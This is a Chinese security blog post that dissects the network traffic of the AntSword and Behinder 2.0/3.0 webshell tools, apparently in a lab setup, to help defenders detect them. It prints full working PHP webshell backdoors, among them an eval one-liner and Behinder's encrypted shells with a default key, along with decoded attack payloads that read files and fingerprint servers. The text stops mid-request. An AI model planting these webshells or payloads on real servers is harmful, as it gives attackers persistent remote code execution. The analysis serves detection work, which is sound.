s1eep123's blog.

常见Webshell连接工具流量分析

红蓝攻防/web安全 攻防 web安全
Word count: 2.9kReading time: 15 min
2022/09/08

常见Webshell连接工具流量分析

蚁剑

网站后门一句话
1
<?php eval($_POST['bckdor']);?>
wireshark抓包

image-20220908111858077

连接过程分析

  1. http request数据包

    1
    2
    3
    4
    5
    6
    7
    8
    9
    POST /ma.php HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1643
    Connection: close

    bckdor=%40eval(%40base64_decode(%24_POST%5B'e435b616de0459'%5D))%3B&e435b616de0459=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoIi87fDovIiwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLjE1MzA5NTg5MWJkZCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICI1NTFhIi4iYzc1ODAiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImY1NSIuIjJiZSI7fW9iX3N0YXJ0KCk7dHJ5eyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk%2FJHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7

    url解码后

    1
    bckdor=@eval(@base64_decode($_POST['e435b616de0459']));&e435b616de0459=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoIi87fDovIiwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLjE1MzA5NTg5MWJkZCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICI1NTFhIi4iYzc1ODAiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImY1NSIuIjJiZSI7fW9iX3N0YXJ0KCk7dHJ5eyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7

    解码base部分+代码格式化+分析

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    @
    ini_set("display_errors", "0");@
    set_time_limit(0);
    $opdir = @ini_get("open_basedir");  //获取用户可访问服务器的目录
    if ($opdir) {
        $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]); //当前文件在服务器的绝对路径,后获取目录部分
        $oparr = preg_split("/;|:/", $opdir);
        @array_push($oparr, $ocwd, sys_get_temp_dir()); //
        foreach($oparr as $item) {  //遍历用户可访问服务器的目录,当前文件绝对目录,临时文件目录
            if (!@is_writable($item)) {
                continue;
            };
            $tmdir = $item."/.153095891bdd";
            @mkdir($tmdir); //创建临时目录153095891bdd
            if (!@file_exists($tmdir)) {
                continue;
            }
            @chdir($tmdir); //改变目录到153095891bdd
            @ini_set("open_basedir", ".."); //将153095891bdd添加到可访问服务器的目录
            $cntarr = @preg_split("/\\\\|\//", $tmdir);
            for ($i = 0; $i < sizeof($cntarr); $i++) {@
                chdir("..");
            };@
            ini_set("open_basedir", "/");@
            rmdir($tmdir);
            break;
        };
    };;

    function asenc($out) {
        return@ base64_encode($out);
    };

    function asoutput() {
        $output = ob_get_contents();
        ob_end_clean();
        echo "551a".
        "c7580";
        echo@ asenc($output);
        echo "f55".
        "2be";
    }
    ob_start();
    try {
        $D = dirname($_SERVER["SCRIPT_FILENAME"]);
        if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
        $R = "{$D}	";
        if (substr($D, 0, 1) != "/") {
            foreach(range("C", "Z") as $L) if (is_dir("{$L}:")) $R. = "{$L}:";
        } else {
            $R. = "/";
        }
        $R. = "	";
        $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
        $s = ($u) ? $u["name"] : @get_current_user();
        $R. = php_uname();
        $R. = "	{$s}";
        echo $R;;
    } catch (Exception $e) {
        echo "ERROR://".$e - > getMessage();
    };
    asoutput();
    die();

    Response包

    1
    2
    3
    4
    5
    6
    7
    8
    9
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 02:43:30 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    551ac7580RDovcGhwU3R1ZHlfNjQvcGhwc3R1ZHlfcHJvL1dXVy9waHAJQzpEOkU6RjpHOglXaW5kb3dzIE5UIERFU0tUT1AtUkk1OTA2SyA2LjIgYnVpbGQgOTIwMCAoV2luZG93cyA4IEhvbWUgUHJlbWl1bSBFZGl0aW9uKSBBTUQ2NAlyb3lhbA==f552be
命令执行分析

  1. POST包

    1
    2
    3
    4
    5
    6
    7
    8
    9
    POST /ma.php HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1413
    Connection: close

    b22dda04ada35c=rRRDovcGhwU3R1ZHlfNjQvcGhwc3R1ZHlfcHJvL1dXVy9waHAvLmh0YWNjZXNz&bckdor=%40eval(%40base64_decode(%24_POST%5B'i999ba0d8875f2'%5D))%3B&i999ba0d8875f2=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoIi87fDovIiwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmVlMDgzIjtAbWtkaXIoJHRtZGlyKTtpZighQGZpbGVfZXhpc3RzKCR0bWRpcikpe2NvbnRpbnVlO31AY2hkaXIoJHRtZGlyKTtAaW5pX3NldCgib3Blbl9iYXNlZGlyIiwgIi4uIik7JGNudGFycj1AcHJlZ19zcGxpdCgiL1xcXFx8XC8vIiwkdG1kaXIpO2ZvcigkaT0wOyRpPHNpemVvZigkY250YXJyKTskaSsrKXtAY2hkaXIoIi4uIik7fTtAaW5pX3NldCgib3Blbl9iYXNlZGlyIiwiLyIpO0BybWRpcigkdG1kaXIpO2JyZWFrO307fTs7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIEBiYXNlNjRfZW5jb2RlKCRvdXQpO307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gImI5MTkiLiI1ODVkNiI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMGNiIi4iMjNiNyI7fW9iX3N0YXJ0KCk7dHJ5eyRGPWJhc2U2NF9kZWNvZGUoc3Vic3RyKCRfUE9TVFsiYjIyZGRhMDRhZGEzNWMiXSwyKSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpP2ZpbGVzaXplKCRGKTo0MDk2KSk7QGZjbG9zZSgkUCk7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D

  2. 解密

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    b22dda04ada35c=rRRDovcGhwU3R1ZHlfNjQvcGhwc3R1ZHlfcHJvL1dXVy9waHAvLmh0YWNjZXNz
    &bckdor=@eval(@base64_decode($_POST['i999ba0d8875f2']));

    &i999ba0d8875f2=
    @ini_set("display_errors", "0");@
    set_time_limit(0);
    $opdir = @ini_get("open_basedir");
    if ($opdir) {
        $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
        $oparr = preg_split("/;|:/", $opdir);@
        array_push($oparr, $ocwd, sys_get_temp_dir());
        foreach($oparr as $item) {
            if (!@is_writable($item)) {
                continue;
            };
            $tmdir = $item.
            "/.ee083";@
            mkdir($tmdir);
            if (!@file_exists($tmdir)) {
                continue;
            }@
            chdir($tmdir);@
            ini_set("open_basedir", "..");
            $cntarr = @preg_split("/\\\\|\//", $tmdir);
            for ($i = 0; $i < sizeof($cntarr); $i++) {@
                chdir("..");
            };@
            ini_set("open_basedir", "/");@
            rmdir($tmdir);
            break;
        };
    };;

    function asenc($out) {
        return@ base64_encode($out);
    };

    function asoutput() {
        $output = ob_get_contents();
        ob_end_clean();
        echo "b919".
        "585d6";
        echo@ asenc($output);
        echo "0cb".
        "23b7";
    }
    ob_start();
    try {
        $F = base64_decode(substr($_POST["b22dda04ada35c"], 2));
        $P = @fopen($F, "r");
        echo(@fread($P, filesize($F) ? filesize($F) : 4096));@
        fclose($P);;
    } catch (Exception $e) {
        echo "ERROR://".$e - > getMessage();
    };
    asoutput();
    die();

冰蝎2.0流量分析

后门

这里以冰蝎自带的php webshell进行分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}
?>
wireshark抓包

image-20220908151648206

连接过程分析

会对 Get 传入的pass这个参数进行检查,如果存在的话会以时间的方式生成长度16的随机key,然后存入到session当中,再往后判断是否开启了openssl这个扩展,开启的情况就会开启AES进行解密,得到中间结果字符串 assert|eval("phpinfo();") 此数据是由冰蝎加载器发出的,已经定义好的,服务端利用explode函数将拆分为一个字符串数据,然后以可变函数方式调用索引为0的数组元素,参数为索引为1的数组元素,即为 assert("eval("phpinfo;")")。没有开启的情况,进行异或处理然后通过base64加密。这就是同时在早期有一定的免杀效果,但是这个函数现在已经被标注为危险函数。

  1. 第一次get请求

    1
    2
    3
    4
    5
    6
    GET /shell.php?pass=830 HTTP/1.1
    Content-type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
    Host: 192.168.124.15
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:15:29 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=oat0ierrkmesft82r8f3cahld0; path=/
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    efc6eabf7e74c052

    服务器端产生密钥写入session,session和当前会话绑定。

  2. 第二次get请求

    1
    2
    3
    4
    5
    6
    GET /shell.php?pass=862 HTTP/1.1
    Content-type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
    Host: 192.168.124.15
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:15:29 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=guos18kll9it96vi1d5pt2hfv3; path=/
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    2799e642b49292f5

    第二次请求是为了获取key。此时的 2799e642b49292f5就为解密代码的key。

  3. 第三次POST请求

    post的数据可以利用上面的Key进行解密获得代码,解密网址http://tools.bugscaner.com/cryptoaes/

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    POST /shell.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=guos18kll9it96vi1d5pt2hfv3; path=/
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
    Cache-Control: no-cache
    Pragma: no-cache
    Host: 192.168.124.15
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    Content-Length: 1112

    4JJ1vgeFtENJjbeFggAdnhHtjfRuRERCT+s+xGLdeFFNHb2FL64aXqppeyKCYKOtMDJ2Q0MkWM0uK78atu2idaEJlhKfrmMYWe4cZNUSp5Ildf4Ssz+NmZ+mm5bCrwTHeTeGuBr+4sMBL/5rba8aQYVNxM9FurbkuCGL22pSQw7S4lq+wbCoPN+BAhTHFfN19bb3JYeYlP3X/gib0Uc+OObKBLjkjVkoBgwxi9G71ynaBeStn59BnmZSuTNWMa5s2YzAkMwmBcKoHjG362MHAJZnetnGolqI8hyoBZW5RUJkVlFEPM+VScUT+ZEe6tNJfmjCHthycvxbDcNLmiwTQhDAH5WtwwAGjt210wkn278dT1TPDy4hbGMYJVCOBnHNoIGHk3DAqeC0YbJHWRRrk50Y7A7uvHhDtGJmvBQc9S9SlhqMG2UKxMUF+KGlYiuchUMP5uvSIABDEQn7rgyHQWW6EGw3n9BOFStEKngzj/xX/Og9s0YpeUUjeza4PCmRtV3fIaj+ZiwBhbUsbJJ25hZMR9W5HcttD/6nxEx95Aj/jV1f8VxCsHN/0+j8GqmLTIo42IHpTxFGVTI/a2T13uPdhAJ3VLzVS36d9hmiwHIpYBhffnt/zWZW2lCxVTw1h5K3TKvmfGfiNr1JJkdLzdhd3AT0Hi/fZHSOOg/2nn/fpBGolYUGOa2s0KUDWjyGBsmXKwTi5gjeFNL+VQDt4QI+Dv921eQ4Z/tzCT/alkoCC1smBkVz8yYAxsWJJin8PON4aT3T9GzilqxkfRDHjDcVu5uInani3Y0f5QSNCSqfA24FXh2gbH3F1p/3RYKdBhwz7g1jESUV0/vb4ulvKFz9jaaS4j6wx8rIcjzCsIXRISwe3/270jWKWZbI7szA7obaNPxXL/0h5ufQL+mkVDd/L2ByfQXofhidjn7dbfLhkDmAkYhCKGY/R84zOUs8+B81wJ7l2grTF4c6jdvT/oJNnjtBVz6D3i5WInCTzBMe2IGreRIx9KZhhGNs48rzyP5EKkqOv/Sx2HJR+9t54xvxXGKDM67NCidH6e6gr37n2HKUIvZ9fsNSDA+xhFKpkVzLoYxmLthnjuQHXB+Gnw==
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:15:29 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    Bnd5kIU4J47rBRDDsjLphOLDXZvLCCz7jxHMJr5Et5nRT4dXOImO66RrGr2hl8wf4VtOZadbTvs/8BE1My4QAoG2emIcUrCIDh40VIS25l/oyrLapJB/2y59OPr4AAmb

    请求包Aes解密后的数据

    1
    assert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIG1haW4oJGNvbnRlbnQpDQp7DQoJJHJlc3VsdCA9IGFycmF5KCk7DQoJJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKCRjb250ZW50KTsNCiAgICAka2V5ID0gJF9TRVNTSU9OWydrJ107DQogICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCRrZXkpOw0KfQ0KDQpmdW5jdGlvbiBlbmNyeXB0KCRkYXRhLCRrZXkpDQp7DQoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkNCiAgICAJew0KICAgIAkJZm9yKCRpPTA7JGk8c3RybGVuKCRkYXRhKTskaSsrKSB7DQogICAgCQkJICRkYXRhWyRpXSA9ICRkYXRhWyRpXV4ka2V5WyRpKzEmMTVdOyANCiAgICAJCQl9DQoJCQlyZXR1cm4gJGRhdGE7DQogICAgCX0NCiAgICBlbHNlDQogICAgCXsNCiAgICAJCXJldHVybiBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJBRVMxMjgiLCAka2V5KTsNCiAgICAJfQ0KfSRjb250ZW50PSI2MDc2YjhjMy04NTJiLTRkOGQtYjg0MS0xYzMxMDNhNWY5NTYiOw0KbWFpbigkY29udGVudCk7'));

    请求包base64 decode

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    @error_reporting(0);
    function main($content)
    {
    	$result = array();
    	$result["status"] = base64_encode("success");
        $result["msg"] = base64_encode($content);
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result),$key);
    }

    function encrypt($data,$key)
    {
    	if(!extension_loaded('openssl'))
        	{
        		for($i=0;$i<strlen($data);$i++) {
        			 $data[$i] = $data[$i]^$key[$i+1&15]; 
        			}
    			return $data;
        	}
        else
        	{
        		return openssl_encrypt($data, "AES128", $key);
        	}
    }$content="6076b8c3-852b-4d8d-b841-1c3103a5f956";
    main($content);

    响应包aes解密

    1
    {"status":"c3VjY2Vzcw==","msg":"NjA3NmI4YzMtODUyYi00ZDhkLWI4NDEtMWMzMTAzYTVmOTU2"}

    现在很多厂商已经对返回的内容进行匹配。所以这种动态加密的方式会在冰蝎3取消

  4. 第四次POST请求

    请求体解密,phpinfo()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    error_reporting(0);
    function main() {
        ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
        $driveList ="";
        if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
        {
            for($i=65;$i<=90;$i++)
        	{
        		$drive=chr($i).':/';
        		file_exists($drive) ? $driveList=$driveList.$drive.";":'';
        	}
        }
    	else
    	{
    		$driveList="/";
    	}
        $currentPath=getcwd();
        //echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
        $osInfo=PHP_OS;
        $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
        //echo json_encode($result);
        session_start();
        $key=$_SESSION['k'];
        //echo json_encode($result);
        //echo openssl_encrypt(json_encode($result), "AES128", $key);
        echo encrypt(json_encode($result), $key);
    }

    function encrypt($data,$key)
    {
    	if(!extension_loaded('openssl'))
        	{
        		for($i=0;$i<strlen($data);$i++) {
        			 $data[$i] = $data[$i]^$key[$i+1&15]; 
        			}
    			return $data;
        	}
        else
        	{
        		return openssl_encrypt($data, "AES128", $key);
        	}
    }
    main();

冰蝎3.0流量分析

后门代码

与2.0版本相比对密码进行了md5的加密,少了一个响应随机生成16位字符key的功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>
wireshark抓包分析

image-20220908154800432

流量分析

分析流量发现相比2.0少了动态密钥的获取的请求,aes密钥变为 md5("pass")[0:16] 意思就是为32位md5的前16位。全程不再交互密钥生成。一共就俩次请求,第一次请求为判断是否可以建立连接,少了俩次get获取冰蝎动态密钥的行为,第二次发送phpinfo等代码执行,获取网站的信息。

  1. 第一次POST请求

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    POST /shell.php HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-type: application/x-www-form-urlencoded
    Referer: http://127.0.0.1/A8.php
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0
    Cache-Control: no-cache
    Pragma: no-cache
    Host: 127.0.0.1
    Connection: keep-alive
    Content-Length: 1432

